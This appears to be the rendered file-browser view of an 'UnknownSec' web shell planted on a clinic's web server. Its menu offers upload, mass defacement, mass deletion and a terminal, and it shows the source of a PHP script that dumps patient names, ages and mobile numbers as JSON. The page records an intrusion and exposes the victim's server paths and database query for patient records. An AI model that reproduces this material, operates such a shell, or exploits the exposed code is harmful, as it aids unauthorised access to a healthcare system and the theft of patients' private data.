UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
load_patient.php
<?php require_once "config.php"; $sql = "Select opddate,suhid,name,concat(agey,' ',pntageyrs) as agey,sex,mobile from v_patientdetails where isdeleted='".$gnotdeleted."' and financialyearid='".$gcurrentfinancialyearid."' order by sfileno DESC"; $resultset = mysqli_query($conn, $sql) or die("database error:". mysqli_error($conn)); $data = array(); while( $rows = mysqli_fetch_assoc($resultset) ) { $data[] = $rows; } $results = array( "sEcho" => 1, "iTotalRecords" => count($data), "iTotalDisplayRecords" => count($data), "aaData" => $data ); echo json_encode($results); ?>
Copyright © 2025 - UnknownSec